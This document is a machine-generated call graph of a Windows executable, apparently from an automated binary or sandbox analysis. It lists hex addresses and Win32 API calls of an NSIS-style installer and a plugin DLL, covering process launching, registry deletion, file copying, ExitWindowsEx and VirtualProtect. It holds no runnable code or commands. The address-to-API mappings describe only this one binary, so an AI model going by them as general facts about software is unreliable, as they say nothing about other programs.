401a42 4945 402b1d 18 API calls 4944->4945 4946 401a48 4945->4946 4947 402b1d 18 API calls 4946->4947 4948 4019f0 4947->4948 4949 402746 4950 402741 4949->4950 4950->4949 4951 402756 FindNextFileW 4950->4951 4952 4027a8 4951->4952 4954 402761 4951->4954 4955 405f48 lstrcpynW 4952->4955 4955->4954 4956 401cc6 4957 402b1d 18 API calls 4956->4957 4958 401cd9 SetWindowLongW 4957->4958 4959 4029c7 4958->4959 4236 401dc7 4244 402b1d 4236->4244 4238 401dcd 4239 402b1d 18 API calls 4238->4239 4240 401dd6 4239->4240 4241 401de8 EnableWindow 4240->4241 4242 401ddd ShowWindow 4240->4242 4243 4029c7 4241->4243 4242->4243 4245 405f6a 18 API calls 4244->4245 4246 402b31 4245->4246 4246->4238 4960 401bca 4961 402b1d 18 API calls 4960->4961 4962 401bd1 4961->4962 4963 402b1d 18 API calls 4962->4963 4964 401bdb 4963->4964 4965 401beb 4964->4965 4966 402b3a 18 API calls 4964->4966 4967 401bfb 4965->4967 4968 402b3a 18 API calls 4965->4968 4966->4965 4969 401c06 4967->4969 4970 401c4a 4967->4970 4968->4967 4972 402b1d 18 API calls 4969->4972 4971 402b3a 18 API calls 4970->4971 4973 401c4f 4971->4973 4974 401c0b 4972->4974 4975 402b3a 18 API calls 4973->4975 4976 402b1d 18 API calls 4974->4976 4978 401c58 FindWindowExW 4975->4978 4977 401c14 4976->4977 4979 401c3a SendMessageW 4977->4979 4980 401c1c SendMessageTimeoutW 4977->4980 4981 401c7a 4978->4981 4979->4981 4980->4981 4982 40194b 4983 402b1d 18 API calls 4982->4983 4984 401952 4983->4984 4985 402b1d 18 API calls 4984->4985 4986 40195c 4985->4986 4987 402b3a 18 API calls 4986->4987 4988 401965 4987->4988 4989 401979 lstrlenW 4988->4989 4994 4019b5 4988->4994 4990 401983 4989->4990 4990->4994 4995 405f48 lstrcpynW 4990->4995 4992 40199e 4993 4019ab lstrlenW 4992->4993 4992->4994 4993->4994 4995->4992 4999 4024cc 5000 402b3a 18 API calls 4999->5000 5001 4024d3 5000->5001 5004 405bb4 GetFileAttributesW CreateFileW 5001->5004 5003 4024df 5004->5003 5005 40164d 5006 402b3a 18 API calls 5005->5006 5007 401653 5006->5007 5008 40628b 2 API calls 5007->5008 5009 401659 5008->5009 5010 4019cf 5011 402b3a 18 API calls 5010->5011 5012 4019d6 5011->5012 5013 402b3a 18 API calls 5012->5013 5014 4019df 5013->5014 5015 4019e6 lstrcmpiW 5014->5015 5016 4019f8 lstrcmpW 5014->5016 5017 4019ec 5015->5017 5016->5017 5018 401e51 5019 402b3a 18 API calls 5018->5019 5020 401e57 5019->5020 5021 4051f2 25 API calls 5020->5021 5022 401e61 5021->5022 5023 4056c3 2 API calls 5022->5023 5024 401e67 5023->5024 5025 401ec6 CloseHandle 5024->5025 5026 401e77 WaitForSingleObject 5024->5026 5028 402793 5024->5028 5025->5028 5027 401e89 5026->5027 5029 401e9b GetExitCodeProcess 5027->5029 5030 4062eb 2 API calls 5027->5030 5031 401eb8 5029->5031 5032 401ead 5029->5032 5033 401e90 WaitForSingleObject 5030->5033 5031->5025 5035 405e8f wsprintfW 5032->5035 5033->5027 5035->5031 4384 401752 4385 402b3a 18 API calls 4384->4385 4386 401759 4385->4386 4387 401781 4386->4387 4388 401779 4386->4388 4425 405f48 lstrcpynW 4387->4425 4424 405f48 lstrcpynW 4388->4424 4391 40178c 4393 405993 3 API calls 4391->4393 4392 40177f 4395 4061dc 5 API calls 4392->4395 4394 401792 lstrcatW 4393->4394 4394->4392 4400 40179e 4395->4400 4396 40628b 2 API calls 4396->4400 4397 4017da 4399 405b8f 2 API calls 4397->4399 4399->4400 4400->4396 4400->4397 4401 4017b0 CompareFileTime 4400->4401 4402 401870 4400->4402 4405 405f48 lstrcpynW 4400->4405 4411 405f6a 18 API calls 4400->4411 4422 401847 4400->4422 4423 405bb4 GetFileAttributesW CreateFileW 4400->4423 4426 405724 4400->4426 4401->4400 4403 4051f2 25 API calls 4402->4403 4406 40187a 4403->4406 4404 4051f2 25 API calls 4410 40185c 4404->4410 4405->4400 4407 403062 46 API calls 4406->4407 4409 40188d 4407->4409 4408 4018a1 SetFileTime 4412 4018b3 CloseHandle 4408->4412 4409->4408 4409->4412 4411->4400 4412->4410 4413 4018c4 4412->4413 4414 4018c9 4413->4414 4415 4018dc 4413->4415 4416 405f6a 18 API calls 4414->4416 4417 405f6a 18 API calls 4415->4417 4418 4018d1 lstrcatW 4416->4418 4419 4018e4 4417->4419 4418->4419 4421 405724 MessageBoxIndirectW 4419->4421 4421->4410 4422->4404 4422->4410 4423->4400 4424->4392 4425->4391 4427 405739 4426->4427 4428 405785 4427->4428 4429 40574d MessageBoxIndirectW 4427->4429 4428->4400 4429->4428 4430 402253 4431 402261 4430->4431 4432 40225b 4430->4432 4434 402b3a 18 API calls 4431->4434 4437 40226f 4431->4437 4433 402b3a 18 API calls 4432->4433 4433->4431 4434->4437 4435 40227d 4436 402b3a 18 API calls 4435->4436 4439 402286 WritePrivateProfileStringW 4436->4439 4437->4435 4438 402b3a 18 API calls 4437->4438 4438->4435 5050 402454 5051 402c44 19 API calls 5050->5051 5052 40245e 5051->5052 5053 402b1d 18 API calls 5052->5053 5054 402467 5053->5054 5055 40248b RegEnumValueW 5054->5055 5056 40247f RegEnumKeyW 5054->5056 5057 402793 5054->5057 5055->5057 5058 4024a4 RegCloseKey 5055->5058 5056->5058 5058->5057 5060 401ed4 5061 402b3a 18 API calls 5060->5061 5062 401edb 5061->5062 5063 40628b 2 API calls 5062->5063 5064 401ee1 5063->5064 5065 401ef2 5064->5065 5067 405e8f wsprintfW 5064->5067 5067->5065 4453 4022d5 4454 402305 4453->4454 4455 4022da 4453->4455 4457 402b3a 18 API calls 4454->4457 4476 402c44 4455->4476 4459 40230c 4457->4459 4458 4022e1 4460 4022eb 4458->4460 4464 402322 4458->4464 4465 402b7a RegOpenKeyExW 4459->4465 4461 402b3a 18 API calls 4460->4461 4463 4022f2 RegDeleteValueW RegCloseKey 4461->4463 4463->4464 4466 402c0e 4465->4466 4470 402ba5 4465->4470 4466->4464 4467 402bcb RegEnumKeyW 4468 402bdd RegCloseKey 4467->4468 4467->4470 4471 4062b2 3 API calls 4468->4471 4469 402c02 RegCloseKey 4474 402bf1 4469->4474 4470->4467 4470->4468 4470->4469 4472 402b7a 3 API calls 4470->4472 4473 402bed 4471->4473 4472->4470 4473->4474 4475 402c1d RegDeleteKeyW 4473->4475 4474->4466 4475->4474 4477 402b3a 18 API calls 4476->4477 4478 402c5d 4477->4478 4479 402c6b RegOpenKeyExW 4478->4479 4479->4458 5068 4014d7 5069 402b1d 18 API calls 5068->5069 5070 4014dd Sleep 5069->5070 5072 4029c7 5070->5072 4705 40335a #17 SetErrorMode OleInitialize 4706 4062b2 3 API calls 4705->4706 4707 40339d SHGetFileInfoW 4706->4707 4780 405f48 lstrcpynW 4707->4780 4709 4033c8 GetCommandLineW 4781 405f48 lstrcpynW 4709->4781 4711 4033da GetModuleHandleW 4712 4033f4 4711->4712 4713 4059c0 CharNextW 4712->4713 4714 403402 CharNextW 4713->4714 4726 403414 4714->4726 4715 403516 4716 40352a GetTempPathW 4715->4716 4782 403326 4716->4782 4718 403542 4719 403546 GetWindowsDirectoryW lstrcatW 4718->4719 4720 40359c DeleteFileW 4718->4720 4722 403326 11 API calls 4719->4722 4790 402dbc GetTickCount GetModuleFileNameW 4720->4790 4721 4059c0 CharNextW 4721->4726 4724 403562 4722->4724 4724->4720 4727 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4724->4727 4725 4035b0 4734 4059c0 CharNextW 4725->4734 4763 403653 4725->4763 4775 403663 4725->4775 4726->4715 4726->4721 4728 403518 4726->4728 4729 403326 11 API calls 4727->4729 4874 405f48 lstrcpynW 4728->4874 4733 403594 4729->4733 4733->4720 4733->4775 4748 4035cf 4734->4748 4736 403772 4739 403815 ExitProcess 4736->4739 4744 4062b2 3 API calls 4736->4744 4737 40367c 4738 405724 MessageBoxIndirectW 4737->4738 4740 40368a ExitProcess 4738->4740 4741 403692 lstrcatW lstrcmpiW 4746 4036ae CreateDirectoryW SetCurrentDirectoryW 4741->4746 4741->4775 4742 40362d 4745 405a9b 18 API calls 4742->4745 4747 403785 4744->4747 4749 403639 4745->4749 4750 4036d1 4746->4750 4751 4036c6 4746->4751 4752 4062b2 3 API calls 4747->4752 4748->4741 4748->4742 4749->4775 4875 405f48 lstrcpynW 4749->4875 4887 405f48 lstrcpynW 4750->4887 4886 405f48 lstrcpynW 4751->4886 4753 40378e 4752->4753 4756 4062b2 3 API calls 4753->4756 4758 403797 4756->4758 4760 4037b5 4758->4760 4766 4037a5 GetCurrentProcess 4758->4766 4759 403648 4876 405f48 lstrcpynW 4759->4876 4764 4062b2 3 API calls 4760->4764 4762 405f6a 18 API calls 4765 403710 DeleteFileW 4762->4765 4820 40391f 4763->4820 4767 4037ec 4764->4767 4768 40371d CopyFileW 4765->4768 4777 4036df 4765->4777 4766->4760 4770 403801 ExitWindowsEx 4767->4770 4772 40380e 4767->4772 4768->4777 4769 403766 4773 405de2 40 API calls 4769->4773 4770->4739 4770->4772 4771 405de2 40 API calls 4771->4777 4774 40140b 2 API calls 4772->4774 4773->4775 4774->4739 4877 40382d 4775->4877 4776 405f6a 18 API calls 4776->4777 4777->4762 4777->4769 4777->4771 4777->4776 4779 403751 CloseHandle 4777->4779 4888 4056c3 CreateProcessW 4777->4888 4779->4777 4780->4709 4781->4711 4783 4061dc 5 API calls 4782->4783 4785 403332 4783->4785 4784 40333c 4784->4718 4785->4784 4786 405993 3 API calls 4785->4786 4787 403344 CreateDirectoryW 4786->4787 4891 405be3 4787->4891 4895 405bb4 GetFileAttributesW CreateFileW 4790->4895 4792 402dff 4819 402e0c 4792->4819 4896 405f48 lstrcpynW 4792->4896 4794 402e22 4795 4059df 2 API calls 4794->4795 4796 402e28 4795->4796 4897 405f48 lstrcpynW 4796->4897 4798 402e33 GetFileSize 4799 402f34 4798->4799 4817 402e4a 4798->4817 4800 402d1a 33 API calls 4799->4800 4801 402f3b 4800->4801 4803 402f77 GlobalAlloc 4801->4803 4801->4819 4899 40330f SetFilePointer 4801->4899 4802 4032f9 ReadFile 4802->4817 4807 402f8e 4803->4807 4804 402fcf 4805 402d1a 33 API calls 4804->4805 4805->4819 4811 405be3 2 API calls 4807->4811 4808 402f58 4809 4032f9 ReadFile 4808->4809 4813 402f63 4809->4813 4810 402d1a 33 API calls 4810->4817 4812 402f9f CreateFileW 4811->4812 4814 402fd9 4812->4814 4812->4819 4813->4803 4813->4819 4898 40330f SetFilePointer 4814->4898 4816 402fe7 4818 403062 46 API calls 4816->4818 4817->4799 4817->4802 4817->4804 4817->4810 4817->4819 4818->4819 4819->4725 4821 4062b2 3 API calls 4820->4821 4822 403933 4821->4822 4823 403939 4822->4823 4824 40394b 4822->4824 4909 405e8f wsprintfW 4823->4909 4825 405e15 3 API calls 4824->4825 4826 40397b 4825->4826 4827 40399a lstrcatW 4826->4827 4830 405e15 3 API calls 4826->4830 4829 403949 4827->4829 4900 403bf5 4829->4900 4830->4827 4833 405a9b 18 API calls 4834 4039cc 4833->4834 4835 403a60 4834->4835 4838 405e15 3 API calls 4834->4838 4836 405a9b 18 API calls 4835->4836 4837 403a66 4836->4837 4839 403a76 LoadImageW 4837->4839 4841 405f6a 18 API calls 4837->4841 4840 4039fe 4838->4840 4842 403b1c 4839->4842 4843 403a9d RegisterClassW 4839->4843 4840->4835 4844 403a1f lstrlenW 4840->4844 4848 4059c0 CharNextW 4840->4848 4841->4839 4847 40140b 2 API calls 4842->4847 4845 403ad3 SystemParametersInfoW CreateWindowExW 4843->4845 4846 403b26 4843->4846 4849 403a53 4844->4849 4850 403a2d lstrcmpiW 4844->4850 4845->4842 4846->4775 4851 403b22 4847->4851 4852 403a1c 4848->4852 4854 405993 3 API calls 4849->4854 4850->4849 4853 403a3d GetFileAttributesW 4850->4853 4851->4846 4856 403bf5 19 API calls 4851->4856 4852->4844 4855 403a49 4853->4855 4857 403a59 4854->4857 4855->4849 4858 4059df 2 API calls 4855->4858 4859 403b33 4856->4859 4910 405f48 lstrcpynW 4857->4910 4858->4849 4861 403bc2 4859->4861 4862 403b3f ShowWindow LoadLibraryW 4859->4862 4863 4052c5 5 API calls 4861->4863 4864 403b65 GetClassInfoW 4862->4864 4865 403b5e LoadLibraryW 4862->4865 4868 403bc8 4863->4868 4866 403b79 GetClassInfoW RegisterClassW 4864->4866 4867 403b8f DialogBoxParamW 4864->4867 4865->4864 4866->4867 4869 40140b 2 API calls 4867->4869 4870 403be4 4868->4870 4871 403bcc 4868->4871 4869->4846 4872 40140b 2 API calls 4870->4872 4871->4846 4873 40140b 2 API calls 4871->4873 4872->4846 4873->4846 4874->4716 4875->4759 4876->4763 4878 403848 4877->4878 4879 40383e CloseHandle 4877->4879 4880 403852 CloseHandle 4878->4880 4881 40385c 4878->4881 4879->4878 4880->4881 4912 40388a 4881->4912 4884 4057d0 71 API calls 4885 40366c OleUninitialize 4884->4885 4885->4736 4885->4737 4886->4750 4887->4777 4889 4056f2 CloseHandle 4888->4889 4890 4056fe 4888->4890 4889->4890 4890->4777 4892 405bf0 GetTickCount GetTempFileNameW 4891->4892 4893 405c26 4892->4893 4894 403358 4892->4894 4893->4892 4893->4894 4894->4718 4895->4792 4896->4794 4897->4798 4898->4816 4899->4808 4901 403c09 4900->4901 4911 405e8f wsprintfW 4901->4911 4903 403c7a 4904 405f6a 18 API calls 4903->4904 4905 403c86 SetWindowTextW 4904->4905 4906 403ca2 4905->4906 4907 4039aa 4905->4907 4906->4907 4908 405f6a 18 API calls 4906->4908 4907->4833 4908->4906 4909->4829 4910->4835 4911->4903 4913 403898 4912->4913 4914 40389d FreeLibrary GlobalFree 4913->4914 4915 403861 4913->4915 4914->4914 4914->4915 4915->4884 5080 40155b 5081 40296d 5080->5081 5084 405e8f wsprintfW 5081->5084 5083 402972 5084->5083 5085 4038dd 5086 4038e8 5085->5086 5087 4038ec 5086->5087 5088 4038ef GlobalAlloc 5086->5088 5088->5087 5089 40165e 5090 402b3a 18 API calls 5089->5090 5091 401665 5090->5091 5092 402b3a 18 API calls 5091->5092 5093 40166e 5092->5093 5094 402b3a 18 API calls 5093->5094 5095 401677 MoveFileW 5094->5095 5096 401683 5095->5096 5097 40168a 5095->5097 5099 401423 25 API calls 5096->5099 5098 40628b 2 API calls 5097->5098 5101 402197 5097->5101 5100 401699 5098->5100 5099->5101 5100->5101 5102 405de2 40 API calls 5100->5102 5102->5096 5103 4023e0 5104 402c44 19 API calls 5103->5104 5105 4023ea 5104->5105 5106 402b3a 18 API calls 5105->5106 5107 4023f3 5106->5107 5108 4023fe RegQueryValueExW 5107->5108 5111 402793 5107->5111 5109 40241e 5108->5109 5110 402424 RegCloseKey 5108->5110 5109->5110 5114 405e8f wsprintfW 5109->5114 5110->5111 5114->5110 5115 401ce5 GetDlgItem GetClientRect 5116 402b3a 18 API calls 5115->5116 5117 401d17 LoadImageW SendMessageW 5116->5117 5118 401d35 DeleteObject 5117->5118 5119 4029c7 5117->5119 5118->5119 5120 405166 5121 405176 5120->5121 5122 40518a 5120->5122 5123 4051d3 5121->5123 5124 40517c 5121->5124 5125 405192 IsWindowVisible 5122->5125 5131 4051a9 5122->5131 5127 4051d8 CallWindowProcW 5123->5127 5128 4041e6 SendMessageW 5124->5128 5125->5123 5126 40519f 5125->5126 5133 404abc SendMessageW 5126->5133 5130 405186 5127->5130 5128->5130 5131->5127 5138 404b3c 5131->5138 5134 404b1b SendMessageW 5133->5134 5135 404adf GetMessagePos ScreenToClient SendMessageW 5133->5135 5137 404b13 5134->5137 5136 404b18 5135->5136 5135->5137 5136->5134 5137->5131 5147 405f48 lstrcpynW 5138->5147 5140 404b4f 5148 405e8f wsprintfW 5140->5148 5142 404b59 5143 40140b 2 API calls 5142->5143 5144 404b62 5143->5144 5149 405f48 lstrcpynW 5144->5149 5146 404b69 5146->5123 5147->5140 5148->5142 5149->5146 5150 4042e8 lstrlenW 5151 404307 5150->5151 5152 404309 WideCharToMultiByte 5150->5152 5151->5152 5160 100018a9 5161 100018cc 5160->5161 5162 100018ff GlobalFree 5161->5162 5163 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5161->5163 5162->5163 5164 10001272 2 API calls 5163->5164 5165 10001a87 GlobalFree GlobalFree 5164->5165 5166 40206a 5167 402b3a 18 API calls 5166->5167 5168 402071 5167->5168 5169 402b3a 18 API calls 5168->5169 5170 40207b 5169->5170 5171 402b3a 18 API calls 5170->5171 5172 402084 5171->5172 5173 402b3a 18 API calls 5172->5173 5174 40208e 5173->5174 5175 402b3a 18 API calls 5174->5175 5176 402098 5175->5176 5177 4020ac CoCreateInstance 5176->5177 5178 402b3a 18 API calls 5176->5178 5181 4020cb 5177->5181 5178->5177 5179 401423 25 API calls 5180 402197 5179->5180 5181->5179 5181->5180 5182 40156b 5183 401584 5182->5183 5184 40157b ShowWindow 5182->5184 5185 401592 ShowWindow 5183->5185 5186 4029c7 5183->5186 5184->5183 5185->5186 5187 404b6e GetDlgItem GetDlgItem 5188 404bc0 7 API calls 5187->5188 5196 404dd9 5187->5196 5189 404c63 DeleteObject 5188->5189 5190 404c56 SendMessageW 5188->5190 5191 404c6c 5189->5191 5190->5189 5193 404ca3 5191->5193 5195 405f6a 18 API calls 5191->5195 5192 404ebd 5194 404f69 5192->5194 5203 404f16 SendMessageW 5192->5203 5226 404dcc 5192->5226 5197 40419a 19 API calls 5193->5197 5199 404f73 SendMessageW 5194->5199 5200 404f7b 5194->5200 5201 404c85 SendMessageW SendMessageW 5195->5201 5196->5192 5207 404abc 5 API calls 5196->5207 5230 404e4a 5196->5230 5198 404cb7 5197->5198 5202 40419a 19 API calls 5198->5202 5199->5200 5206 404fa4 5200->5206 5212 404f94 5200->5212 5213 404f8d ImageList_Destroy 5200->5213 5201->5191 5208 404cc5 5202->5208 5210 404f2b SendMessageW 5203->5210 5203->5226 5204 404201 8 API calls 5211 40515f 5204->5211 5205 404eaf SendMessageW 5205->5192 5209 405113 5206->5209 5229 404b3c 4 API calls 5206->5229 5234 404fdf 5206->5234 5207->5230 5215 404d9a GetWindowLongW SetWindowLongW 5208->5215 5222 404d15 SendMessageW 5208->5222 5224 404d94 5208->5224 5227 404d51 SendMessageW 5208->5227 5228 404d62 SendMessageW 5208->5228 5216 405125 ShowWindow GetDlgItem ShowWindow 5209->5216 5209->5226 5218 404f3e 5210->5218 5212->5206 5214 404f9d GlobalFree 5212->5214 5213->5212 5214->5206 5217 404db3 5215->5217 5216->5226 5219 404dd1 5217->5219 5220 404db9 ShowWindow 5217->5220 5223 404f4f SendMessageW 5218->5223 5239 4041cf SendMessageW 5219->5239 5238 4041cf SendMessageW 5220->5238 5222->5208 5223->5194 5224->5215 5224->5217 5226->5204 5227->5208 5228->5208 5229->5234 5230->5192 5230->5205 5231 4050e9 InvalidateRect 5231->5209 5232 4050ff 5231->5232 5240 4049d6 5232->5240 5233 40500d SendMessageW 5237 405023 5233->5237 5234->5233 5234->5237 5236 405097 SendMessageW SendMessageW 5236->5237 5237->5231 5237->5236 5238->5226 5239->5196 5241 4049f3 5240->5241 5242 405f6a 18 API calls 5241->5242 5243 404a28 5242->5243 5244 405f6a 18 API calls 5243->5244 5245 404a33 5244->5245 5246 405f6a 18 API calls 5245->5246 5247 404a64 lstrlenW wsprintfW SetDlgItemTextW 5246->5247 5247->5209 5248 4024ee 5249 4024f3 5248->5249 5250 40250c 5248->5250 5251 402b1d 18 API calls 5249->5251 5252 402512 5250->5252 5253 40253e 5250->5253 5258 4024fa 5251->5258 5254 402b3a 18 API calls 5252->5254 5255 402b3a 18 API calls 5253->5255 5256 402519 WideCharToMultiByte lstrlenA 5254->5256 5257 402545 lstrlenW 5255->5257 5256->5258 5257->5258 5259 402793 5258->5259 5260 402567 WriteFile 5258->5260 5260->5259 5261 4045ee 5262 404624 5261->5262 5263 4045fe 5261->5263 5265 404201 8 API calls 5262->5265 5264 40419a 19 API calls 5263->5264 5266 40460b SetDlgItemTextW 5264->5266 5267 404630 5265->5267 5266->5262 5268 4018ef 5269 401926 5268->5269 5270 402b3a 18 API calls 5269->5270 5271 40192b 5270->5271 5272 4057d0 71 API calls 5271->5272 5273 401934 5272->5273 5274 404970 5275 404980 5274->5275 5276 40499c 5274->5276 5285 405708 GetDlgItemTextW 5275->5285 5278 4049a2 SHGetPathFromIDListW 5276->5278 5279 4049cf 5276->5279 5281 4049b9 SendMessageW 5278->5281 5282 4049b2 5278->5282 5280 40498d SendMessageW 5280->5276 5281->5279 5283 40140b 2 API calls 5282->5283 5283->5281 5285->5280 5286 402770 5287 402b3a 18 API calls 5286->5287 5288 402777 FindFirstFileW 5287->5288 5289 40278a 5288->5289 5290 40279f 5288->5290 5291 4027a8 5290->5291 5294 405e8f wsprintfW 5290->5294 5295 405f48 lstrcpynW 5291->5295 5294->5291 5295->5289 5296 4014f1 SetForegroundWindow 5297 4029c7 5296->5297 5298 4018f2 5299 402b3a 18 API calls 5298->5299 5300 4018f9 5299->5300 5301 405724 MessageBoxIndirectW 5300->5301 5302 401902 5301->5302 4440 402573 4441 402b1d 18 API calls 4440->4441 4447 402582 4441->4447 4442 4026a0 4443 4025c8 ReadFile 4443->4442 4443->4447 4444 405c37 ReadFile 4444->4447 4445 4026a2 4452 405e8f wsprintfW 4445->4452 4446 402608 MultiByteToWideChar 4446->4447 4447->4442 4447->4443 4447->4444 4447->4445 4447->4446 4449 40262e SetFilePointer MultiByteToWideChar 4447->4449 4450 4026b3 4447->4450 4449->4447 4450->4442 4451 4026d4 SetFilePointer 4450->4451 4451->4442 4452->4442 5303 401df3 5304 402b3a 18 API calls 5303->5304 5305 401df9 5304->5305 5306 402b3a 18 API calls 5305->5306 5307 401e02 5306->5307 5308 402b3a 18 API calls 5307->5308 5309 401e0b 5308->5309 5310 402b3a 18 API calls 5309->5310 5311 401e14 5310->5311 5312 401423 25 API calls 5311->5312 5313 401e1b ShellExecuteW 5312->5313 5314 401e4c 5313->5314 5320 100016b6 5321 100016e5 5320->5321 5322 10001b18 22 API calls 5321->5322 5323 100016ec 5322->5323 5324 100016f3 5323->5324 5325 100016ff 5323->5325 5326 10001272 2 API calls 5324->5326 5327 10001726 5325->5327 5328 10001709 5325->5328 5331 100016fd 5326->5331 5329 10001750 5327->5329 5330 1000172c 5327->5330 5332 1000153d 3 API calls 5328->5332 5334 1000153d 3 API calls 5329->5334 5333 100015b4 3 API calls 5330->5333 5335 1000170e 5332->5335 5337 10001731 5333->5337 5334->5331 5336 100015b4 3 API calls 5335->5336 5338 10001714 5336->5338 5339 10001272 2 API calls 5337->5339 5340 10001272 2 API calls 5338->5340 5341 10001737 GlobalFree 5339->5341 5342 1000171a GlobalFree 5340->5342 5341->5331 5343 1000174b GlobalFree 5341->5343 5342->5331 5343->5331 5344 10002238 5345 10002296 5344->5345 5347 100022cc 5344->5347 5346 100022a8 GlobalAlloc 5345->5346 5345->5347 5346->5345 4677 4026f9 4678 402700 4677->4678 4681 402972 4677->4681 4679 402b1d 18 API calls 4678->4679 4680 40270b 4679->4680 4682 402712 SetFilePointer 4680->4682 4682->4681 4683 402722 4682->4683 4685 405e8f wsprintfW 4683->4685 4685->4681 5348 1000103d 5349 1000101b 5 API calls 5348->5349 5350 10001056 5349->5350 5351 402c7f 5352 402c91 SetTimer 5351->5352 5353 402caa 5351->5353 5352->5353 5354 402cf8 5353->5354 5355 402cfe MulDiv 5353->5355 5356 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5355->5356 5356->5354 5358 4014ff 5359 401507 5358->5359 5361 40151a 5358->5361 5360 402b1d 18 API calls 5359->5360 5360->5361 5362 401000 5363 401037 BeginPaint GetClientRect 5362->5363 5364 40100c DefWindowProcW 5362->5364 5365 4010f3 5363->5365 5367 401179 5364->5367 5368 401073 CreateBrushIndirect FillRect DeleteObject 5365->5368 5369 4010fc 5365->5369 5368->5365 5370 401102 CreateFontIndirectW 5369->5370 5371 401167 EndPaint 5369->5371 5370->5371 5372 401112 6 API calls 5370->5372 5371->5367 5372->5371 5373 401a00 5374 402b3a 18 API calls 5373->5374 5375 401a09 ExpandEnvironmentStringsW 5374->5375 5376 401a1d 5375->5376 5378 401a30 5375->5378 5377 401a22 lstrcmpW 5376->5377 5376->5378 5377->5378 5379 401b01 5380 402b3a 18 API calls 5379->5380 5381 401b08 5380->5381 5382 402b1d 18 API calls 5381->5382 5383 401b11 wsprintfW 5382->5383 5384 4029c7 5383->5384 4247 100027c7 4248 10002817 4247->4248 4249 100027d7 VirtualProtect 4247->4249 4249->4248 5392 401f08 5393 402b3a 18 API calls 5392->5393 5394 401f0f GetFileVersionInfoSizeW 5393->5394 5395 401f36 GlobalAlloc 5394->5395 5396 401f8c 5394->5396 5395->5396 5397 401f4a GetFileVersionInfoW 5395->5397 5397->5396 5398 401f59 VerQueryValueW 5397->5398 5398->5396 5399 401f72 5398->5399 5403 405e8f wsprintfW 5399->5403 5401 401f7e 5404 405e8f wsprintfW 5401->5404 5403->5401 5404->5396 5405 401c8e 5406 402b1d 18 API calls 5405->5406 5407 401c94 IsWindow 5406->5407 5408 4019f0 5407->5408 5409 1000164f 5410 10001516 GlobalFree 5409->5410 5413 10001667 5410->5413 5411 100016ad GlobalFree 5412 10001682 5412->5411 5413->5411 5413->5412 5414 10001699 VirtualFree 5413->5414 5414->5411 5422 401491 5423 4051f2 25 API calls 5422->5423 5424 401498 5423->5424 4480 402295 4481 402b3a 18 API calls 4480->4481 4482 4022a4 4481->4482 4483 402b3a 18 API calls 4482->4483 4484 4022ad 4483->4484 4485 402b3a 18 API calls 4484->4485 4486 4022b7 GetPrivateProfileStringW 4485->4486 4487 401718 4488 402b3a 18 API calls 4487->4488 4489 40171f SearchPathW 4488->4489 4490 40173a 4489->4490 4491 401f98 4492 401faa 4491->4492 4502 40205c 4491->4502 4493 402b3a 18 API calls 4492->4493 4494 401fb1 4493->4494 4496 402b3a 18 API calls 4494->4496 4495 401423 25 API calls 4500 402197 4495->4500 4497 401fba 4496->4497 4498 401fd0 LoadLibraryExW 4497->4498 4499 401fc2 GetModuleHandleW 4497->4499 4501 401fe1 4498->4501 4498->4502 4499->4498 4499->4501 4514 40631e WideCharToMultiByte 4501->4514 4502->4495 4505 401ff2 4508 402011 4505->4508 4509 401ffa 4505->4509 4506 40202b 4507 4051f2 25 API calls 4506->4507 4510 402002 4507->4510 4517 10001759 4508->4517 4559 401423 4509->4559 4510->4500 4512 40204e FreeLibrary 4510->4512 4512->4500 4515 406348 GetProcAddress 4514->4515 4516 401fec 4514->4516 4515->4516 4516->4505 4516->4506 4518 10001789 4517->4518 4562 10001b18 4518->4562 4520 10001790 4521 100018a6 4520->4521 4522 100017a1 4520->4522 4523 100017a8 4520->4523 4521->4510 4611 10002286 4522->4611 4594 100022d0 4523->4594 4528 100017cd 4529 1000180c 4528->4529 4530 100017ee 4528->4530 4534 10001812 4529->4534 4535 1000184e 4529->4535 4624 100024a9 4530->4624 4532 100017be 4533 100017c4 4532->4533 4538 100017cf 4532->4538 4533->4528 4605 100028a4 4533->4605 4540 100015b4 3 API calls 4534->4540 4542 100024a9 10 API calls 4535->4542 4536 100017d7 4536->4528 4621 10002b5f 4536->4621 4537 100017f4 4635 100015b4 4537->4635 4615 10002645 4538->4615 4545 10001828 4540->4545 4546 10001840 4542->4546 4549 100024a9 10 API calls 4545->4549 4550 10001895 4546->4550 4646 1000246c 4546->4646 4548 100017d5 4548->4528 4549->4546 4550->4521 4554 1000189f GlobalFree 4550->4554 4554->4521 4556 10001881 4556->4550 4650 1000153d wsprintfW 4556->4650 4557 1000187a FreeLibrary 4557->4556 4560 4051f2 25 API calls 4559->4560 4561 401431 4560->4561 4561->4510 4653 1000121b GlobalAlloc 4562->4653 4564 10001b3c 4654 1000121b GlobalAlloc 4564->4654 4566 10001d7a GlobalFree GlobalFree GlobalFree 4567 10001d97 4566->4567 4578 10001de1 4566->4578 4569 100020ee 4567->4569 4577 10001dac 4567->4577 4567->4578 4568 10001b47 4568->4566 4570 10001c1d GlobalAlloc 4568->4570 4572 10001c86 GlobalFree 4568->4572 4575 10001c68 lstrcpyW 4568->4575 4568->4578 4579 10001c72 lstrcpyW 4568->4579 4583 10002048 4568->4583 4587 10001f37 GlobalFree 4568->4587 4590 1000122c 2 API calls 4568->4590 4592 10001cc4 4568->4592 4660 1000121b GlobalAlloc 4568->4660 4571 10002110 GetModuleHandleW 4569->4571 4569->4578 4570->4568 4573 10002121 LoadLibraryW 4571->4573 4574 10002136 4571->4574 4572->4568 4573->4574 4573->4578 4661 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4574->4661 4575->4579 4577->4578 4657 1000122c 4577->4657 4578->4520 4579->4568 4580 10002188 4580->4578 4581 10002195 lstrlenW 4580->4581 4662 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4581->4662 4583->4578 4586 10002090 lstrcpyW 4583->4586 4586->4578 4587->4568 4588 10002148 4588->4580 4593 10002172 GetProcAddress 4588->4593 4589 100021af 4589->4578 4590->4568 4592->4568 4655 1000158f GlobalSize GlobalAlloc 4592->4655 4593->4580 4596 100022e8 4594->4596 4595 1000122c GlobalAlloc lstrcpynW 4595->4596 4596->4595 4598 10002415 GlobalFree 4596->4598 4600 100023d3 lstrlenW 4596->4600 4601 100023ba GlobalAlloc CLSIDFromString 4596->4601 4602 1000238f GlobalAlloc WideCharToMultiByte 4596->4602 4664 100012ba 4596->4664 4598->4596 4599 100017ae 4598->4599 